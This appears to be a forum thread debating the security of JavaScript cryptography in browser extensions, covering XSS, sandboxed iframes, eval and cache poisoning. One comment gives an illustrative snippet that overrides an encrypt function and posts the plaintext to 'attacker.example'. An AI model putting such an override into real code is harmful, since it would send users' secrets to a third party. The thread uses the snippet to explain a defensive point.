
Java, Python, etc don't have a DOM to consider.

When you're just an XSS away from an attacker doing:

  function encrypt(plaintext) {
    // exfiltrate the plaintext before "encrypting" it
    // (attacker.example is an illustrative attacker-controlled URL)
    $.post("https://attacker.example/", { stolen: plaintext });
    return plaintext;
  }
then you lose. The post talks about this, and XSS isn't the only way either.


If all of the JavaScript code and application functionality is bundled into the add-on, it's trivial to avoid XSS. There's no "site" to script into via the URL, and rendering of dynamic elements can be done via a sandboxed iframe, preventing any scripts from running within dynamic data. This is fairly basic security that any add-on developer should be aware of: http://developer.chrome.com/apps/sandboxingEval.html
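For reference, the Chrome docs linked above describe declaring a sandboxed page in the extension's manifest; a minimal sketch (the filename is illustrative) looks like:

```json
{
  "name": "My Add-on",
  "version": "1.0",
  "manifest_version": 2,
  "sandbox": {
    "pages": ["sandbox.html"]
  }
}
```

The main extension page then embeds sandbox.html in an iframe and hands it untrusted data via postMessage. Scripts in the sandboxed page run in a unique origin with no access to the extension's APIs or the parent page's DOM, so injected markup can't script into the extension itself.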

"XSS isn't the only way either." That's about as illuminating as saying "something bad could happen."

No one is saying JavaScript or browser security is perfect, but if you actually know what you're doing, it can be done properly.

The original "JavaScript security is doomed" Matasano article is extremely out of date at this point, and yet people keep referring to it like it's gospel.


I don't like the article either, but you're wrong about it being "extremely out of date", and you'd have a very hard time defending your argument with evidence. Do try.


Right, but an attacker needs access to the DOM first. If everything is packaged, this is just as difficult as being able to inject random Python code.

Sure, you can set up your app to stupidly do evals everywhere, but you can program a bad app in any language.
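To make the eval point concrete, here's a minimal sketch of the difference between eval-ing untrusted data and parsing it. Names and payloads are illustrative:

```javascript
// Untrusted string, e.g. dynamic data fetched by the extension.
const untrusted = '{"user": "alice"}';

// Bad: eval executes arbitrary code if the string contains any.
// const data = eval('(' + untrusted + ')');  // never do this

// Good: JSON.parse only parses data; it cannot run code.
const data = JSON.parse(untrusted);
console.log(data.user); // "alice"

// A code-injection payload throws instead of executing:
let threw = false;
try {
  JSON.parse('alert(1)');
} catch (e) {
  threw = true;
}
console.log(threw); // true
```

The point being: you have to go out of your way (eval, innerHTML on untrusted strings, etc.) to open the hole; the same is true of, say, Python's eval or pickle.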

> XSS isn't the only way either

That's very, very vague. I asked what the attack vectors are. Saying "others" doesn't really work for me.


Right, like getting access to the DOM was ever a hard thing to do. I was specifically referring to web apps on that point, but since you insist, I'll just reference [1].

Another vector to get rogue JS into a user's browser is cache-poisoning, something the article also brings up.

[1] http://media.blackhat.com/bh-us-12/Briefings/Osborn/BH_US_12...


Cache poisoning won't work if an extension loads all of its code from its own bundle. So I fail to see how this applies to an app that is fully self-contained within an extension (extensions themselves are signed, so it's not like you could MitM the extension bundle itself...)




